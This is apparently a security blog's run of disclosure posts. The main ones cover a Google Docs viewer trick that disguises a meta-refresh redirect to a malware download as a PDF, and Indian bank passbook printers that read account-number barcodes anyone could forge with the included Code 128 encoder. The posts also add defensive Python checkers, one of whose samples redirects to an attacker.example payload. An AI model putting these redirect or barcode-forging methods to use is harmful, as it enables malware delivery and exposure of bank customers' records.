Spreading malicious software via the Google Docs viewer



Google Docs is a word processor offered by Google within its Google Drive service. It lets users create and edit documents online and collaborate in real time: a document can be shared, opened and edited by several users at once, and each of them sees the others' changes character by character as they are typed.

Google used to have a page that let users quickly view documents online right from the browser. The Google Docs Viewer was available at docs.google.com/viewer and drive.google.com/viewer: you entered a document URL and Google generated a link to view it. This worked for many file types: Microsoft Office files, PDFs, PostScript files and more.

That page is no longer available; its URL now returns a 404. The viewer itself still works, though, if you pass the document URL as a query parameter:

https://docs.google.com/viewer?url=[URL to pdf file]

For example

https://docs.google.com/viewer?url=https://bitcoin.org/bitcoin.pdf


The Flaw

I wondered what would happen if I gave it the URL of a website (say, a malicious one). For testing I used the URL of my own site, and to my surprise it returned a 500 error.

https://docs.google.com/viewer?url=http://www.hackatrick.com


Next I entered the link of a .gif image to see whether it would open, but I got a 'No preview' error.


I also tried the link of a website with an open redirect flaw, to see whether the viewer would follow the redirect. Instead it displayed the HTML source code of the redirect page.


So an open redirect is of no use here: when the target redirects, the viewer just renders the HTML source of the redirect page. The viewer appeared to decide what to do from the URL's extension: it shows the HTML source when the URL ends in .html, renders the file when the URL ends in .pdf, and returns a 500 error when given a bare domain name.

My goal was still to redirect the user to a site of my choosing through the Google Docs viewer, so I looked for another way.

I created a directory on my website and named it demo1.pdf. Inside that directory I created an HTML file named index.html with the following content:

<html>
<head>
<title>A web page that sends the browser to a different page as soon as it loads</title>
<!-- content="N; URL=..." loads URL after N seconds; 0 means immediately -->
<meta http-equiv="refresh" content="0; URL=[link to malicious software]">
<meta name="keywords" content="automatic redirection">
</head>
<body>
test
manually.
</body>
</html>
The meta refresh tag sends the browser to the URL given in the content attribute after the stated number of seconds (0 here, so immediately).

When I entered the URL of this directory in the Google Docs viewer, Google treated it as an ordinary PDF rather than HTML, so it did not display the HTML source; and since there was no actual PDF to render, it showed a 'No preview' message.
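The trick works because the viewer, and later the user, judge the file by its URL rather than by its content. The Python check below, added here as an example and not code from the original post, does the opposite: it classifies a fetched response by its magic bytes and Content-Type, and looks for a meta refresh that would send the browser elsewhere. The sample path /demo1.pdf/, both response bodies and the target http://attacker.example/payload.exe are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Every real PDF begins with this header; an HTML page never does.
PDF_MAGIC = b"%PDF-"


def claimed_extension(url: str) -> str:
    """The extension a user reads off the URL, e.g. 'pdf' for /demo1.pdf/."""
    name = urlsplit(url).path.rstrip("/").rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def find_meta_refresh(body: bytes):
    """Return the target URL of a <meta http-equiv="refresh"> tag, or None."""
    for tag in re.finditer(rb"<meta\b[^>]*>", body, re.IGNORECASE):
        t = tag.group(0)
        if not re.search(rb"""http-equiv\s*=\s*["']?\s*refresh""", t, re.IGNORECASE):
            continue
        m = re.search(rb"""content\s*=\s*["']?\s*\d+\s*;\s*url\s*=\s*([^"'>\s]+)""",
                      t, re.IGNORECASE)
        if m:
            return m.group(1).decode("latin-1")
    return None


def actual_kind(body: bytes) -> str:
    """Classify the body by what it contains, not by what it is called."""
    if body.startswith(PDF_MAGIC):
        return "pdf"
    if re.search(rb"<!doctype\s+html|<html\b", body[:2048], re.IGNORECASE):
        return "html"
    return "other"


def inspect_response(url: str, content_type: str, body: bytes) -> dict:
    """Flag responses whose name or header promises a PDF but whose bytes do not."""
    claimed = claimed_extension(url)
    kind = actual_kind(body)
    redirect = find_meta_refresh(body) if kind == "html" else None
    header_pdf = content_type.split(";", 1)[0].strip().lower() == "application/pdf"
    suspicious = (claimed == "pdf" and kind != "pdf") \
        or (header_pdf and kind != "pdf") or redirect is not None
    return {"claimed": claimed, "actual": kind, "meta_refresh": redirect,
            "suspicious": suspicious}


# Constructed samples (not captured from the real viewer or site).
FAKE_PDF_URL = "http://www.hackatrick.com/demo1.pdf/"   # assumed path of the directory trick
FAKE_PDF_BODY = b"""<html><head>
<meta http-equiv="refresh" content="0; URL=http://attacker.example/payload.exe">
</head><body>test</body></html>"""
REAL_PDF_URL = "https://bitcoin.org/bitcoin.pdf"
REAL_PDF_BODY = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"   # stub: header only

if __name__ == "__main__":
    print(inspect_response(FAKE_PDF_URL, "text/html", FAKE_PDF_BODY))
    print(inspect_response(REAL_PDF_URL, "application/pdf", REAL_PDF_BODY))
```

A proxy or mail gateway that applies this check would flag the directory trick twice over: the ".pdf" in the URL does not match the HTML body, and the body carries a meta refresh to a third host.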



Now, if a user receives this link, three things work in the attacker's favour. First, the URL clearly ends in .pdf. Second, the user wonders why a PDF will not open in the viewer. Third, Google suggests third-party apps for opening the PDF. Nothing tells the user that this is not actually a PDF. So if the user clicks the 'View original' button at the top of the viewer page, the browser lands in the /demo1.pdf directory, whose index.html redirects to the malicious software link.

Firefox shows a popup with a save option, while Chrome starts the download automatically.

[Screenshot: Firefox save-file dialog]

[Screenshot: Chrome starting the download automatically]

I reported the flaw to the Google security team, but it does not qualify under their bug bounty program because they do not consider it a valid vulnerability. That does not matter much; the fun and the learning are more important. Google thanked me for informing them about the issue and said they will fix it soon. Hopefully!

This serious flaw in Indian banks can be used to learn the bank balance and transaction history of any customer


Passbooks with Barcodes for automatic passbook printing

With the advancement of technology everything around us is getting digitized. There was a time when people had to go to the bank to withdraw or deposit money; now ATMs, net banking and mobile banking make this much easier and faster. Banks use technology to reach a wider section of people and to make the whole process fast, accurate and secure.

Earlier, people had to ask a bank employee to update their passbook. Recently State Bank of India installed automatic passbook printers called 'Swayam', with which any customer can update their passbook just by inserting it into the machine.

Unlike an ATM, where you must insert your debit or credit card and enter the PIN issued by the bank before you can withdraw money, the automatic passbook printer asks for no card and no PIN. The customer simply inserts the passbook and the machine prints the entire transaction history into it.

So how does the machine recognize whose passbook it is?


The bank does something very simple: it pastes a barcode into each passbook. When the customer inserts the passbook, the barcode scanner inside the machine reads the barcode, and the printer then prints the transaction details of the matching account into the passbook.

This made me curious. With no card and no PIN involved, the barcode is the only thing identifying the customer, so I assumed its data must be protected in some way, encrypted or at least unguessable.

So I visited different banks in my city to check which of them had actually installed automatic passbook printers, and whether they all used the same barcode method or added some other layer of security. I visited the following banks:



  • State Bank of India
  • Union Bank
  • Bank of India
  • Indian Bank
  • Bank of Baroda
  • HDFC 
  • Canara Bank
  • UCO
  • Central Bank of India 
Most of these banks have already installed the automatic passbook printer; a few have not yet done so but plan to.

One thing common to all of them is that the printer relies on the barcode alone; there is no other authentication.

Next I started analysing the barcode data used by the different banks' machines.

I took barcodes from the following banks:

  • State Bank of India
  • UCO Bank
  • Canara Bank

State Bank of India


Scanning an SBI barcode showed a barcode in the common Code 128 format whose data was not the account number; at first I took this for some kind of encryption. I soon realised it is actually indirection: the branch receives pre-printed barcode stickers from another location, and when a customer asks for a barcode the staff paste one of those stickers into the passbook and record, in the bank's database, which account number that sticker's value belongs to.

For example, if the sticker's barcode data is '12345' and the customer's account number is '9768xxxxx', the bank pastes the sticker with data '12345' into the passbook of account '9768xxxxx'. Whenever that passbook is inserted into the machine, the machine reads '12345', looks up in the database which account it was assigned to, and prints the transaction details of account '9768xxxxx'.

[Image: SBI passbook with barcode sticker; the barcode data is different from the account number]

UCO bank


After State Bank of India I scanned a UCO Bank barcode to see what data and barcode type it used. I was shocked to find that the barcode data was the account number itself, again in Code 128. There was no indirection as in SBI's case. On investigating I learnt that, unlike SBI, which gets pre-printed barcodes from elsewhere and assigns account numbers to them, at UCO Bank the employees print the barcodes themselves.

[Image: UCO Bank passbook; the account number is used as the barcode data]

Canara Bank


After State Bank of India and UCO Bank I went to Canara Bank. Canara Bank does the same as UCO Bank: the account number itself is the barcode data, in Code 128.

[Image: Canara Bank passbook; the account number is used as the barcode data]



Having looked at these banks and their automatic printers, I realised the serious security risk they pose.

An account number is not a secret. To receive money we routinely hand out our account number, and that is perfectly safe. But when the passbook printer uses the account number itself as the barcode data, anyone who knows a customer's account number can generate a barcode from it, paste it into his own passbook, and get the customer's complete transaction history printed: every withdrawal and deposit with date and time, and the current balance.
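Code 128 is a public symbology, so a barcode carrying an account number hides nothing: the only "check" built into it is a checksum that any phone app or label printer computes the same way. The functions below, added here as an illustration and not code from the original post, produce the symbol values an encoder emits for a numeric string (code set C, which label printers normally pick for digits, with a code set B prefix for odd lengths) and read them back while verifying the checksum the way a scanner does. The account numbers are made up.

```python
# Code 128 control values: CODE C switches to set C; START B / START C open a symbol
# sequence in that set; STOP closes it. Data values in set C are 0-99 = digit pairs.
CODE_C, START_B, START_C, STOP = 99, 104, 105, 106


def code128_symbols(digits: str) -> list:
    """Symbol values a Code 128 encoder emits for an all-numeric string.

    Even-length input is encoded in set C throughout (two digits per symbol).
    Odd-length input opens in set B for the first digit and then switches to
    set C for the remaining pairs. The check symbol is the weighted sum of
    all preceding symbols mod 103, exactly as the Code 128 spec defines it.
    """
    if not digits.isdigit():
        raise ValueError("set C encodes digits only")
    if len(digits) % 2 == 0:
        symbols, rest = [START_C], digits
    else:
        # Set B value of an ASCII character is ord(ch) - 32, so '0'..'9' -> 16..25.
        symbols, rest = [START_B, ord(digits[0]) - 32, CODE_C], digits[1:]
    symbols += [int(rest[i:i + 2]) for i in range(0, len(rest), 2)]
    check = (symbols[0] + sum(i * v for i, v in enumerate(symbols[1:], 1))) % 103
    return symbols + [check, STOP]


def code128_digits(symbols: list) -> str:
    """Inverse of code128_symbols: verify the check symbol and read the digits back."""
    if symbols[-1] != STOP:
        raise ValueError("missing STOP")
    body, check = symbols[:-2], symbols[-2]
    expected = (body[0] + sum(i * v for i, v in enumerate(body[1:], 1))) % 103
    if check != expected:
        raise ValueError("check symbol mismatch")
    code_set = "C" if body[0] == START_C else "B"
    out = []
    for v in body[1:]:
        if code_set == "B":
            if v == CODE_C:
                code_set = "C"
            else:
                out.append(chr(v + 32))
        else:
            out.append("%02d" % v)     # in set C, value 99 is the digit pair "99"
    return "".join(out)


if __name__ == "__main__":
    # Constructed account numbers, not real ones.
    for acct in ("12345678", "12345678901"):
        syms = code128_symbols(acct)
        print(acct, "->", syms, "->", code128_digits(syms))
```

The only thing a forged sticker has to get right is the check symbol, and a scanner does not care who printed it: a mod-103 checksum protects against misreads, it does not authenticate the passbook holder. That is why putting the account number in the barcode is equivalent to putting it on a sign.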

I was not fully sure my theory was correct, so I decided to test it in practice.


Case 1

With my father's consent, I took his bank account number and generated a barcode online with the account number itself as the barcode data. I removed the barcode sticker the bank had provided, pasted my own barcode in its place and inserted the passbook into the machine. My theory was correct: the entire transaction history of my father's account was printed in his passbook.

Case 2

Again with my father's consent, I generated a barcode from his account number, but this time I pasted it into my own passbook rather than his and inserted that into the machine. Once again it worked: the entire transaction history of my father's account was printed in my passbook.


This is a serious security flaw. Bank balance and transaction history are meant to be private, and it is dangerous if anyone else can access them.

Is State Bank of India's approach good enough?


No. Making the barcode data different from the account number adds one layer of protection, but the barcode is still printed in the clear in the passbook. Anyone can read a barcode with a smartphone today, so with a little social engineering anyone can obtain the data of an account.

Banks should add another factor of authentication on top of the barcode, such as a PIN or biometrics, so that nobody can fake another customer's barcode and obtain their transaction history.


I went to various banks and informed them about the issue, but was told that the branch staff only know how to operate the machine and issue barcodes. So I emailed the IT teams of the banks that have installed these machines; it has been more than a week and I have had no reply.

[Image: email sent to the IT teams of the different banks]


I am making this public so that people become aware of it, and so that the banks that have not yet installed these machines but plan to do so avoid making the same mistake and protect their customers.

Update Adobe Flash urgently, or you might get hacked!



Last week, Adobe issued a security patch fixing a critical flaw in Flash Player that could allow a remote attacker to take complete control of Windows, Mac and Linux computers. If you have not yet updated Flash Player you are at serious risk, because this flaw is being exploited in the wild.

The flaw can be used to remotely control a user's computer. It was made public last week by the security research firm FireEye, which discovered it and reported it to Adobe. Adobe has now made a patch available, which can be installed through the auto-updater included with Flash.

But that is not the end of it. Independent researcher Kafeine reported that the flaw has also been incorporated into the Magnitude and Angler exploit kits. Because the method of exploiting the vulnerability is now built into malware kits that any malicious actor can use, the threat is much more significant: a far larger number of criminals can now exploit it easily.



Adobe says the following versions of Flash Player are vulnerable:


  • Adobe Flash Player 18.0.0.161 and earlier versions for Windows and Macintosh
  • Adobe Flash Player Extended Support Release version 13.0.0.292 and earlier 13.x versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.466 and earlier 11.x versions for Linux

Adobe recommends that users update to the latest versions:

  • Users of the Adobe Flash Player Desktop Runtime for Windows and Macintosh should update to Adobe Flash Player 18.0.0.194.
  • Users of the Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.296.
  • Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.468.
  • Adobe Flash Player installed with Google Chrome, and Adobe Flash Player installed with Internet Explorer on Windows 8.x, will automatically update to version 18.0.0.194.
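As an added example (not from the original post), here is a small Python check that applies the version table above to an inventory of installed Flash Player builds. The desktop runtime and Extended Support Release branches are told apart by major version, as in Adobe's list; the hostnames and the pre-patch build 18.0.0.160 are constructed for the example.

```python
from typing import Tuple

# First fixed builds from Adobe's advisory quoted above.
FIXED_ESR = "13.0.0.296"        # Extended Support Release (13.x, Windows/Mac)
FIXED_DESKTOP = "18.0.0.194"    # desktop runtime (Windows/Mac)
FIXED_LINUX = "11.2.202.468"    # 11.x on Linux


def parse_version(version: str) -> Tuple[int, ...]:
    """'18.0.0.161' -> (18, 0, 0, 161); tuples compare component by component."""
    return tuple(int(part) for part in version.strip().split("."))


def flash_status(platform: str, version: str) -> str:
    """'vulnerable', 'patched' or 'not covered' for an installed Flash Player build."""
    p = platform.lower()
    v = parse_version(version)
    if p in ("windows", "mac"):
        # 13.x is the ESR branch with its own fix; every other major is judged
        # against the desktop fix ("18.0.0.161 and earlier" includes 17.x, 16.x ...).
        fixed = FIXED_ESR if v[0] == 13 else FIXED_DESKTOP
    elif p == "linux" and v[0] == 11:
        fixed = FIXED_LINUX
    else:
        return "not covered"    # the advisory says nothing about this combination
    return "patched" if v >= parse_version(fixed) else "vulnerable"


def hosts_needing_update(inventory) -> list:
    """Hostnames whose Flash build is still vulnerable."""
    return [host for host, platform, version in inventory
            if flash_status(platform, version) == "vulnerable"]


# Constructed inventory: (hostname, platform, installed Flash build).
INVENTORY = [
    ("ws-01", "windows", "18.0.0.160"),
    ("ws-02", "windows", "18.0.0.194"),
    ("build-esr", "windows", "13.0.0.292"),
    ("lnx-kiosk", "linux", "11.2.202.466"),
    ("mac-01", "mac", "18.0.0.194"),
]

if __name__ == "__main__":
    for host in hosts_needing_update(INVENTORY):
        print("update needed:", host)
```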
If you have not yet updated, the most recent version of Flash is always available from the Flash download page. Installing it closes this hole.

Amazon Web Services(AWS) Secret Keys exposed on GitHub


Amazon Web Services (AWS) has recently been warning developers to watch what they publish or share on GitHub, because AWS "secret keys" turn up in plain view through GitHub search. This is not a hack or a security vulnerability in AWS; it is carelessness on the developer's side. Before getting into details, here are short descriptions of GitHub and AWS.
"Amazon Web Services is a collection of remote computing services that together make up a cloud computing platform, offered over the Internet by Amazon.com. The most central and well-known of these services are Amazon EC2 and Amazon S3." (Wikipedia)
GitHub is a web-based hosting service for software development projects that use the Git revision control system, where developers share their code and help themselves and others.

What are the "secret keys"?

"You can basically think of them as a username and password; they provide authentication to AWS services. Anyone who has access to those keys has access to that particular AWS account. From a security perspective it means they can basically go in and gain access to any of the files that are stored in the AWS account," said Ty Miller, founder of penetration testing firm Threat Intelligence.
That is a huge and largely unrecognised threat to developers: an entire database can be destroyed, and with it the company's reputation and the developer's standing. So before it is too late, check what credentials you have pushed to GitHub if you work with AWS. AWS has already informed most of the affected developers about the issue.
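The "check your credentials on GitHub" advice is easiest to follow with a scanner. The Python below, added here as an example and not code from AWS or GitHub, looks for AWS access key IDs (20 characters starting with AKIA or ASIA) and for 40-character secrets sitting next to a "secret ... key" label, and reports them masked with file and line number. The sample configuration is constructed and uses the example key pair that AWS's own documentation publishes, so nothing real is exposed.

```python
import re

# An access key ID is 20 characters: AKIA (long-term IAM key) or ASIA (temporary
# STS key) followed by 16 upper-case letters or digits.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")

# A secret access key is 40 base64-style characters. On its own that pattern is
# noisy (hashes, tokens), so only flag it next to a "secret ... key" label.
SECRET_RE = re.compile(
    r"""(?i)secret(?:_?access)?_?key\W{0,5}([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"""
)


def mask(value: str) -> str:
    """Keep just enough of a credential to identify it in a report."""
    return value[:4] + "..." + value[-4:]


def scan_text(text: str, path: str = "<stdin>") -> list:
    """One finding per credential-looking token, with file and line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append({"file": path, "line": lineno,
                             "kind": "access_key_id", "value": mask(m.group(0))})
        for m in SECRET_RE.finditer(line):
            findings.append({"file": path, "line": lineno,
                             "kind": "secret_access_key", "value": mask(m.group(1))})
    return findings


# Constructed sample: the AWS documentation example pair, committed "by mistake".
SAMPLE = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-east-1
# similar-looking but wrong length and no label: must not be reported
token = AKIAEXAMPLE
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE, "credentials"):
        print("%(file)s:%(line)d %(kind)s %(value)s" % f)
```

Run it over every file in the repository and over the output of git log -p as well: removing a key from the latest commit does not remove it from history or from existing clones. A key that has ever been pushed should be treated as compromised and revoked in IAM before anything else.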

One example that fits well here: several bloggers have admitted getting a shock on receiving large bills for bandwidth they never used. Luke Chadwick, for instance, was hit with a US$3493 (A$3842) bill in December because of unauthorised activity; to his relief, AWS later refunded it.

If you have any queries, don't hesitate to post it in the comments section. 



What Can Be Done With a Hacked PC?

Some people boast, "Hey! I just hacked a PC!" Some are faking it, but some really have. So what do they actually mean? This article discusses the many ways a hacked PC can be used; later articles will explain each attack and how it works.

A PC, or a server, can be compromised in many ways, but once it is, that machine becomes the attacker's playground, and there is a great deal of harm the attacker can do with it. Yes, your internet-connected PC or phone can be compromised, which is why you should always keep your antivirus updated.

A broad view of the attacks gives me 8 categories:
  • Webserver
  • Bot activity
  • Virtual goods
  • Reputation Hijacking
  • Financial Credentials
  • Hostage Attacks
  • Account Credentials
  • E-mail Attacks
Those are the main 8. Take a look at the infographic I made for brief details of each.
In further posts I'll explain how these attacks work on Linux machines, because I am not a big Windows fan. Windows machines are also the ones most commonly hit by these attacks.
So this post was about knowing what kinds of threats exist; the first and best step a normal PC user can take is to update the antivirus software regularly.

If you have any questions, don't hesitate to post them in the comments section.

Open redirection found on a subdomain of Stackoverflow



I found an open redirection on one of the subdomains of Stackoverflow, a language-independent, collaboratively edited question-and-answer site for programmers. It has a global Alexa rank of 54, which means a great many people visit the site daily, and using this open redirection an attacker could easily send users to a malicious website for phishing and similar attacks. Open redirection occurs when a web page redirects the browser to a destination taken from user-controllable input without validating it.
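The open redirect described in this post, and the one mentioned in the Google Docs viewer post above, both come down to the same bug: a redirect target copied straight from a request parameter. The Python below, added here as an example and not the site's own code, shows that vulnerable pattern beside a validator that accepts only site-absolute paths or http(s) URLs whose host is on an allow list, and rebuilds the URL from the validated parts instead of echoing the input. The allow-listed hosts are assumed for the example.

```python
from urllib.parse import urlsplit, urlunsplit

# Hosts this application is willing to send users to (assumed for the example).
ALLOWED_HOSTS = {"stackoverflow.com", "meta.stackoverflow.com"}


def vulnerable_redirect_target(user_url: str) -> str:
    """The open-redirect pattern: whatever came in the parameter is where we send the user."""
    return user_url


def safe_redirect_target(user_url: str, default: str = "/") -> str:
    """Accept only site-absolute paths or http(s) URLs on an allow-listed host.

    Anything else (other hosts, other schemes, protocol-relative //host and
    ///host, backslash tricks, user@host prefixes) falls back to the default page.
    """
    if not user_url:
        return default
    # Browsers treat a backslash like a slash, so "/\\evil.com" is "//evil.com"
    # client-side; normalise before parsing so we judge what the browser will see.
    candidate = user_url.replace("\\", "/")
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Relative reference. Require a single leading slash: "///evil.com"
        # parses as a path here but browsers resolve it to http://evil.com/.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    if parts.scheme not in ("http", "https"):
        return default                      # javascript:, data:, ...
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS or parts.username or parts.password:
        return default                      # evil.com, stackoverflow.com.evil.com, x@evil.com
    # Rebuild from validated pieces; drop the fragment and force https.
    return urlunsplit(("https", host, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    for u in ("/questions/1", "//evil.com/", "https://stackoverflow.com@evil.com/",
              "https://StackOverflow.com/questions/1?x=1#frag"):
        print(repr(u), "->", vulnerable_redirect_target(u), "|", safe_redirect_target(u))
```

Exact host matching against an allow list is deliberate: prefix or substring checks such as "starts with stackoverflow.com" are exactly what stackoverflow.com.evil.com and stackoverflow.com@evil.com are built to defeat.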